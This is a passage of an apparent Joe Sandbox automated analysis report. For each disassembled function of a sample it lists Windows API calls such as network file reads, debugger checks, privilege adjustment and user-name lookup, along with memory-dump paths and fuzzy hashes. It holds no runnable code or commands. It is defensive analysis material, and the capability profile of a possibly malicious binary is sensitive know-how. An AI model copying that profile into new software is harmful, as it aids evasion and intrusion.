                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
                                              • String ID:
                                              • API String ID: 1423138444-0
                                              • Opcode ID: 76bb91eddd3fabbeb9dc2353754c2d4a33226ba5847df380d95a6a7189902826
                                              • Instruction ID: 03c7a97d63f550c6923a71ebb0d88c244cae95fcf08f12da5351ba0ad8a7c07b
                                              • Opcode Fuzzy Hash: 76bb91eddd3fabbeb9dc2353754c2d4a33226ba5847df380d95a6a7189902826
                                              • Instruction Fuzzy Hash: 6E21EF35200018EFCB258F95CC98EFB7BB9EB8A310F140155F945672A2C376A9D4DB60
                                              Function 00DECE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • InternetReadFile.WININET(?,?,00000400,?), ref: 00DECE89
                                              • GetLastError.KERNEL32(?,00000000), ref: 00DECEEA
                                              • SetEvent.KERNEL32(?,?,00000000), ref: 00DECEFE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: ErrorEventFileInternetLastRead
                                              • String ID:
                                              • API String ID: 234945975-0
                                              • Opcode ID: 6f60e0cf47f2b86d9f62b412565ea61cb998ebe26b48c4c8dbc0f34dbcd25cd8
                                              • Instruction ID: e6b7ebb48781d40c7ef1f0c3df3ee7a403908580b6c0a269fb7e75b13e18bffb
                                              • Opcode Fuzzy Hash: 6f60e0cf47f2b86d9f62b412565ea61cb998ebe26b48c4c8dbc0f34dbcd25cd8
                                              • Instruction Fuzzy Hash: D121BD71510705AFDB20EFA6C949BAB77F8EF00718F24441EE546A2151E774EE4A8B70
                                              Function 00DE5C97 Relevance: 4.6, APIs: 3, Instructions: 138fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • FindFirstFileW.KERNEL32(?,?), ref: 00DE5CC1
                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00DE5D17
                                              • FindClose.KERNEL32(?), ref: 00DE5D5F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Find$File$CloseFirstNext
                                              • String ID:
                                              • API String ID: 3541575487-0
                                              • Opcode ID: de4122b0de2dd50f6790a3ab86c3475c6c1892b4cd9648dbdb18ebfac8f2e3cd
                                              • Instruction ID: 3076af6c5323afa05fabe172ce2d0d6e07ea19206711f6f6bf3931063b7ddac1
                                              • Opcode Fuzzy Hash: de4122b0de2dd50f6790a3ab86c3475c6c1892b4cd9648dbdb18ebfac8f2e3cd
                                              • Instruction Fuzzy Hash: B251BD34600A419FC704DF29D894A9AB7E4FF49318F14855DE95A8B3A1DB30EC44CFA1
                                              Function 00DA2622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • IsDebuggerPresent.KERNEL32 ref: 00DA271A
                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00DA2724
                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 00DA2731
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                              • String ID:
                                              • API String ID: 3906539128-0
                                              • Opcode ID: 51947eabc2ede1d6c40aeb2d6976920f950e5625bddb84390975de99a8f00c89
                                              • Instruction ID: 880b05dfdc5468ad2a7046cca2a39b4ad19f2d6f92c46754a993431a3e3e68cc
                                              • Opcode Fuzzy Hash: 51947eabc2ede1d6c40aeb2d6976920f950e5625bddb84390975de99a8f00c89
                                              • Instruction Fuzzy Hash: A831C274911218ABCB21DF69DC88798BBB8EF08310F5042EAE80CA6260E7349F858F54
                                              Function 00DE51CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON
                                              Download Yara Rule
                                              APIs
                                              • SetErrorMode.KERNEL32(00000001), ref: 00DE51DA
                                              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00DE5238
                                              • SetErrorMode.KERNEL32(00000000), ref: 00DE52A1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: ErrorMode$DiskFreeSpace
                                              • String ID:
                                              • API String ID: 1682464887-0
                                              • Opcode ID: 321205c4b0daa83ce7141bfc7233235183aee20bf87f62240fbadee6bd1bac04
                                              • Instruction ID: a180e468e7af9dc4ea7c3234154f14c2e6eb4569e91a7942e56b2a23cc223542
                                              • Opcode Fuzzy Hash: 321205c4b0daa83ce7141bfc7233235183aee20bf87f62240fbadee6bd1bac04
                                              • Instruction Fuzzy Hash: C4318135A00518DFDB00DF55D884EADBBB4FF49318F188099E909AB366DB31E845CBA0
                                              Function 00DD16C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00D8FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00D90668
                                                • Part of subcall function 00D8FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00D90685
                                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00DD170D
                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00DD173A
                                              • GetLastError.KERNEL32 ref: 00DD174A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                              • String ID:
                                              • API String ID: 577356006-0
                                              • Opcode ID: c42d312654b3adc72e085dd2747234f4d2389a581c1c9fddb241e3febe849db4
                                              • Instruction ID: 64e115ba378114e880c06d9410321787166c0707ce7d69217bd0f52ce369cb61
                                              • Opcode Fuzzy Hash: c42d312654b3adc72e085dd2747234f4d2389a581c1c9fddb241e3febe849db4
                                              • Instruction Fuzzy Hash: 1611CEB2400304FFE718AF64DC86D6AB7BDEB04714B20852EE45663251EB70FC868B30
                                              Function 00DDD5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00DDD608
                                              • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00DDD645
                                              • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00DDD650
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: CloseControlCreateDeviceFileHandle
                                              • String ID:
                                              • API String ID: 33631002-0
                                              • Opcode ID: 9a6130b58e3c5f687300da448597916c4f34d3204e349355509bbecf73e2cc64
                                              • Instruction ID: 1e6fb064364bfa844efff646e6645b82e1da4c8d6cf020f7dbed0bf7f70ed564
                                              • Opcode Fuzzy Hash: 9a6130b58e3c5f687300da448597916c4f34d3204e349355509bbecf73e2cc64
                                              • Instruction Fuzzy Hash: 4B113C75E05228BFDB108F959C45FAFBBBCEB45B50F108156F904E7290D6708A058BA1
                                              Function 00DD1663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00DD168C
                                              • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00DD16A1
                                              • FreeSid.ADVAPI32(?), ref: 00DD16B1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: AllocateCheckFreeInitializeMembershipToken
                                              • String ID:
                                              • API String ID: 3429775523-0
                                              • Opcode ID: c0d62faa736ad645630bdc4a52cc38bca55737e20f1c5aff681907a7e5939a44
                                              • Instruction ID: 9662541c72d4aba8c22261e01715302077d187f33f2a46862c51e918b9708253
                                              • Opcode Fuzzy Hash: c0d62faa736ad645630bdc4a52cc38bca55737e20f1c5aff681907a7e5939a44
                                              • Instruction Fuzzy Hash: F7F04471940309FFEB00CFE08C89AAEBBBCEB08300F104561E500E2180E331AA488A60
                                              Function 00D94CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • GetCurrentProcess.KERNEL32(00DA28E9,?,00D94CBE,00DA28E9,00E388B8,0000000C,00D94E15,00DA28E9,00000002,00000000,?,00DA28E9), ref: 00D94D09
                                              • TerminateProcess.KERNEL32(00000000,?,00D94CBE,00DA28E9,00E388B8,0000000C,00D94E15,00DA28E9,00000002,00000000,?,00DA28E9), ref: 00D94D10
                                              • ExitProcess.KERNEL32 ref: 00D94D22
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Process$CurrentExitTerminate
                                              • String ID:
                                              • API String ID: 1703294689-0
                                              • Opcode ID: 0866c6ba25b1b3235b232c8546cf679d086de961e2a44bbfebfb1c93427eec55
                                              • Instruction ID: 7e4130eac1d583336ff64bff8036f12baebadc461bc39853e4de04c3d6ec9ccd
                                              • Opcode Fuzzy Hash: 0866c6ba25b1b3235b232c8546cf679d086de961e2a44bbfebfb1c93427eec55
                                              • Instruction Fuzzy Hash: 2EE0B635010148AFCF15AF55DD09E583B69FB46791B248154FC059A123CB3ADD86CAA0
                                              Function 00DCD27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetUserNameW.ADVAPI32(?,?), ref: 00DCD28C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: NameUser
                                              • String ID: X64
                                              • API String ID: 2645101109-893830106
                                              • Opcode ID: 28b786f1c6a760b04be9fd9ed82f9ad2d5a7ba88e93fd0b89594763d8ea08185
                                              • Instruction ID: db86b83a2363d92ec6c0b6b090e1b744ec4c7990f5dad6df391d00afaaed0dd0
                                              • Opcode Fuzzy Hash: 28b786f1c6a760b04be9fd9ed82f9ad2d5a7ba88e93fd0b89594763d8ea08185
                                              • Instruction Fuzzy Hash: 04D0C9B480111DEECB94DB90DC88DD9F37CBB04305F200255F146A2040D73095898F20
                                              Function 00D9CAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                              • Instruction ID: 4e534243624c4d7068f91b65c4ebaab6937bf1eea969b3979a6184ccd1600f52
                                              • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                              • Instruction Fuzzy Hash: 99021D71E112199FDF14CFA9C8806ADFBF1EF48314F298169E819E7384D731AA41CBA4
                                              Function 00D7CAF0 Relevance: 3.2, Strings: 2, Instructions: 659COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Variable is not of type 'Object'.$p#
                                              • API String ID: 0-1086706999
                                              • Opcode ID: e2613d2cf136addd4e8ed153d91b417efcd62acd2a8f38237ebc28a40ddbee24
                                              • Instruction ID: d554c80a44267ec75086fb8986d51eac49912e7642cc9faa1765ba6afc364c4f
                                              • Opcode Fuzzy Hash: e2613d2cf136addd4e8ed153d91b417efcd62acd2a8f38237ebc28a40ddbee24
                                              • Instruction Fuzzy Hash: A4324670910219DFDF14DF94C981BEDBBB5EF05304F28905DE84AAB292E735AA46CB70
                                              Function 00D897C0 Relevance: 3.1, APIs: 2, Instructions: 80nativeCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00D89BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00D89BB2
                                                • Part of subcall function 00D89944: GetWindowLongW.USER32(?,000000EB), ref: 00D89952
                                              • GetParent.USER32(?), ref: 00DC73A3
                                              • NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,?,?), ref: 00DC742D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: LongWindow$DialogNtdllParentProc_
                                              • String ID:
                                              • API String ID: 314495775-0
                                              • Opcode ID: bef26c25f4c8d86a1d9a0c5b1a0c936ed073e49974298d41a48fd43cf7e47f20
                                              • Instruction ID: b1e7fcce1dc56aff986a394ee491b3122e1fdd753858d004294469152b5d550f
                                              • Opcode Fuzzy Hash: bef26c25f4c8d86a1d9a0c5b1a0c936ed073e49974298d41a48fd43cf7e47f20
                                              • Instruction Fuzzy Hash: BE210134600101AFCF25AF69CC69EB93BA5EF4A370F1C0259F9A51B2A1C3318D51EB70
                                              Function 00DE68EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • FindFirstFileW.KERNEL32(?,?), ref: 00DE6918
                                              • FindClose.KERNEL32(00000000), ref: 00DE6961
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Find$CloseFileFirst
                                              • String ID:
                                              • API String ID: 2295610775-0
                                              • Opcode ID: 13cd64358aa74c4b2199927b2391f7689441f7b6a5654e6172612d86df0d7063
                                              • Instruction ID: f1de582bfcc7e2f913c13520d754c6ccbf7fcbe9515f747357063718bd0e4186
                                              • Opcode Fuzzy Hash: 13cd64358aa74c4b2199927b2391f7689441f7b6a5654e6172612d86df0d7063
                                              • Instruction Fuzzy Hash: C51190316146409FC710DF6AD884A1ABBE5FF85328F18C69DE4698F6A2D730EC45CBA1
                                              Function 00E090A1 Relevance: 3.0, APIs: 2, Instructions: 44nativewindowCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00D89BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00D89BB2
                                              • NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,00DC769C,?,?,?), ref: 00E09111
                                                • Part of subcall function 00D89944: GetWindowLongW.USER32(?,000000EB), ref: 00D89952
                                              • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00E090F7
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: LongWindow$DialogMessageNtdllProc_Send
                                              • String ID:
                                              • API String ID: 1273190321-0
                                              • Opcode ID: e86d74596fda9d6f9bd708534cfd4aaeec6b9588e347b5ce78c4a0b664e36460
                                              • Instruction ID: 795e3271793efcbeb21138de68f3c25801a57f6bad53d9e4b2f57d9a383242dd
                                              • Opcode Fuzzy Hash: e86d74596fda9d6f9bd708534cfd4aaeec6b9588e347b5ce78c4a0b664e36460
                                              • Instruction Fuzzy Hash: 71012434201204BFDB20AF14DC59FA63BA6FF86324F100158F9412B2E2C7336C85CB20
                                              Function 00DE37B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00DF4891,?,?,00000035,?), ref: 00DE37E4
                                              • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00DF4891,?,?,00000035,?), ref: 00DE37F4
                                              Memory Dump Source
